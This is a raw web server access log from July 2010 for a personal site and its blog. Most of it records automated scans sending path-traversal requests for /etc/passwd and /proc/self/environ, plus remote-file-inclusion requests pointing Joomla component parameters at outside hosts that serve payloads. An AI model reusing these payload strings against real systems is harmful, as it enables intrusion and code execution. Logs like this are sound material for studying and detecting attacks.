125.141.91.138 - - [29/Jul/2010:06:43:52 -0700] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:06:44:01 -0700] "GET /logs/access_100719.log//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:06:44:02 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:06:44:03 -0700] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
208.64.68.228 - - [29/Jul/2010:06:44:13 -0700] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.historiavirtual.org/modules/mod_files/yuki/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
208.64.68.228 - - [29/Jul/2010:06:44:13 -0700] "GET /logs/access_100627.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.historiavirtual.org/modules/mod_files/yuki/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
208.64.68.228 - - [29/Jul/2010:06:44:13 -0700] "GET /logs/access_100524.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.historiavirtual.org/modules/mod_files/yuki/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
208.64.68.228 - - [29/Jul/2010:06:44:13 -0700] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.historiavirtual.org/modules/mod_files/yuki/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:06:45:04 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:06:45:12 -0700] "GET /logs/access_100719.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:06:45:13 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:06:45:13 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:06:45:17 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
174.120.181.101 - - [29/Jul/2010:06:45:23 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:06:46:31 -0700] "GET /logs/access_100719.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:06:46:32 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:06:46:33 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:06:47:19 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
200.6.154.127 - - [29/Jul/2010:06:47:27 -0700] "GET /logs/access_100719.log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:06:47:49 -0700] "GET /logs/access_100628.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:06:48:15 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
67.192.58.33 - - [29/Jul/2010:06:48:54 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.192.58.33 - - [29/Jul/2010:06:48:55 -0700] "POST /logs/access_100716.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.192.58.33 - - [29/Jul/2010:06:48:55 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
174.120.181.101 - - [29/Jul/2010:06:49:09 -0700] "GET /logs/access_100628.log///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "sonyafatah.com"
174.120.181.101 - - [29/Jul/2010:06:49:09 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "sonyafatah.com"
174.120.181.101 - - [29/Jul/2010:06:49:09 -0700] "GET /logs///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "sonyafatah.com"
67.28.112.78 - - [29/Jul/2010:06:49:15 -0700] "POST /wp-cron.php?doing_wp_cron HTTP/1.0" 404 - "-" "WordPress/2.8.5; http://sonyafatah.com/blog" "sonyafatah.com"
212.159.96.180 - - [29/Jul/2010:06:49:16 -0700] "GET /blog/index.php/2007/01/05/its-a-dirty-business-2/ HTTP/1.0" 200 18406 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "sonyafatah.com"
195.5.163.207 - - [29/Jul/2010:06:49:31 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
195.5.163.207 - - [29/Jul/2010:06:49:31 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
91.121.5.196 - - [29/Jul/2010:06:50:18 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
62.112.194.45 - - [29/Jul/2010:06:50:22 -0700] "POST /logs/access_100720.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
62.112.194.45 - - [29/Jul/2010:06:50:22 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
62.112.194.45 - - [29/Jul/2010:06:50:22 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:06:51:00 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:06:51:12 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
67.28.112.78 - - [29/Jul/2010:06:53:05 -0700] "POST /wp-cron.php?doing_wp_cron HTTP/1.0" 404 - "-" "WordPress/2.8.5; http://sonyafatah.com/blog" "sonyafatah.com"
174.120.181.101 - - [29/Jul/2010:06:55:57 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "sonyafatah.com"
213.168.176.11 - - [29/Jul/2010:06:56:08 -0700] "POST /logs/access_100721.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
213.168.176.11 - - [29/Jul/2010:06:56:08 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
213.168.176.11 - - [29/Jul/2010:06:56:09 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
67.28.112.47 - - [29/Jul/2010:06:56:15 -0700] "POST /wp-cron.php?doing_wp_cron HTTP/1.0" 404 - "-" "WordPress/2.8.5; http://sonyafatah.com/blog" "sonyafatah.com"
213.168.176.11 - - [29/Jul/2010:06:56:26 -0700] "POST /logs/access_100721.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
213.168.176.11 - - [29/Jul/2010:06:56:27 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
213.168.176.11 - - [29/Jul/2010:06:56:27 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:06:56:40 -0700] "GET /?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2309 "-" "libwww-perl/5.803" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:06:56:46 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
208.69.56.95 - - [29/Jul/2010:06:57:00 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
208.69.56.95 - - [29/Jul/2010:06:57:00 -0700] "GET /logs/access_100514.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
208.69.56.95 - - [29/Jul/2010:06:57:01 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
208.69.56.95 - - [29/Jul/2010:06:57:03 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
208.69.56.95 - - [29/Jul/2010:06:57:03 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
208.69.56.95 - - [29/Jul/2010:06:57:05 -0700] "GET /logs/access_100514.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:06:57:15 -0700] "GET /logs/access_100628.log///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:06:57:16 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:06:57:16 -0700] "GET /logs///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:06:57:16 -0700] "GET /logs/access_100721.log/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:06:57:17 -0700] "GET /?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2309 "-" "libwww-perl/5.803" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:06:57:17 -0700] "GET /logs/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4942 "-" "libwww-perl/5.803" "sonyafatah.com"
72.30.142.92 - - [29/Jul/2010:06:57:57 -0700] "GET /tmp/tmpCo9dcH/?M=A HTTP/1.0" 200 528 "-" "http_load 29jun2005" "sonyafatah.com"
208.69.56.95 - - [29/Jul/2010:06:58:41 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
208.69.56.95 - - [29/Jul/2010:06:58:50 -0700] "GET /logs/access_100514.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
208.69.56.95 - - [29/Jul/2010:06:58:50 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
81.21.79.214 - - [29/Jul/2010:06:59:17 -0700] "GET /index.php?option=com_gcalendar&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "sonyafatah.com"
117.197.194.213 - - [29/Jul/2010:06:59:46 -0700] "GET /blog/wp-content/uploads/2007/08/HPIM0471.JPG HTTP/1.1" 200 309220 "http://www.exbii.com/showthread.php?t=240619&page=22" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; DS_juicyaccess; desktopsmiley_1_3_6256753813482975_372_9)" "sonyafatah.com"
83.60.200.141 - - [29/Jul/2010:07:00:08 -0700] "GET /blog/index.php/feed/ HTTP/1.1" 200 65521 "-" "intraVnews/1.12 (http://www.intravnews.com/)" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:07:00:44 -0700] "GET /logs/access_100721.log///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
81.21.79.214 - - [29/Jul/2010:07:00:58 -0700] "GET /logs/access_100719.log//index.php?option=com_rokdownloads&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "sonyafatah.com"
81.21.79.214 - - [29/Jul/2010:07:00:58 -0700] "GET /index.php?option=com_rokdownloads&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "sonyafatah.com"
81.21.79.214 - - [29/Jul/2010:07:00:59 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "sonyafatah.com"
208.64.68.228 - - [29/Jul/2010:07:01:09 -0700] "GET /index.php?option=com_g2bridge&controller=http://www.historiavirtual.org/modules/mod_files/yuki/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
208.64.68.228 - - [29/Jul/2010:07:01:09 -0700] "GET /logs/access_100628.log%20%20//index.php?option=com_g2bridge&controller=http://www.historiavirtual.org/modules/mod_files/yuki/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
208.64.68.228 - - [29/Jul/2010:07:01:09 -0700] "GET /logs//index.php?option=com_g2bridge&controller=http://www.historiavirtual.org/modules/mod_files/yuki/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:07:01:09 -0700] "GET /?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2309 "-" "libwww-perl/5.803" "sonyafatah.com"
208.64.68.228 - - [29/Jul/2010:07:01:57 -0700] "GET /logs/access_100720.log%20%20//index.php?option=com_g2bridge&controller=http://www.historiavirtual.org/modules/mod_files/yuki/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
81.21.79.214 - - [29/Jul/2010:07:02:23 -0700] "GET /index.php?option=com_rokdownloads&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:07:03:46 -0700] "GET /logs/access_100711.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:07:05:51 -0700] "GET /logs/access_100719.log///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:07:05:51 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:07:05:51 -0700] "GET /logs///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:07:06:01 -0700] "GET /logs/access_100711.log///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
67.28.112.78 - - [29/Jul/2010:07:06:15 -0700] "POST /wp-cron.php?doing_wp_cron HTTP/1.0" 404 - "-" "WordPress/2.8.5; http://sonyafatah.com/blog" "sonyafatah.com"
67.195.115.242 - - [29/Jul/2010:07:06:15 -0700] "GET /blog/index.php/2008/12/01/canadian-questions-a-year-long-commitment/trackback/ HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "sonyafatah.com"
67.195.115.242 - - [29/Jul/2010:07:06:18 -0700] "GET /blog/index.php/2008/12/01/canadian-questions-a-year-long-commitment/ HTTP/1.0" 200 9574 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "sonyafatah.com"
91.121.5.196 - - [29/Jul/2010:07:07:57 -0700] "GET /logs/access_100628.log///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
91.121.5.196 - - [29/Jul/2010:07:07:57 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
91.121.5.196 - - [29/Jul/2010:07:07:57 -0700] "GET /logs///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
91.121.5.196 - - [29/Jul/2010:07:08:05 -0700] "GET /logs/access_100719.log///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:08:11 -0700] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:08:11 -0700] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:07:08:52 -0700] "GET /logs/access_100703.log/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:07:08:52 -0700] "GET /?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2309 "-" "libwww-perl/5.803" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:07:08:52 -0700] "GET /logs/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4942 "-" "libwww-perl/5.803" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:07:09:14 -0700] "GET /logs/access_100709.log/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
174.120.181.101 - - [29/Jul/2010:07:09:17 -0700] "GET /logs/access_100720.log///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "sonyafatah.com"
174.120.181.101 - - [29/Jul/2010:07:09:17 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "sonyafatah.com"
174.120.181.101 - - [29/Jul/2010:07:09:17 -0700] "GET /logs///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:07:09:18 -0700] "GET /logs/access_100720.log///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:07:09:19 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:07:09:19 -0700] "GET /logs///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:09:33 -0700] "GET /logs/access_100721.log//index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
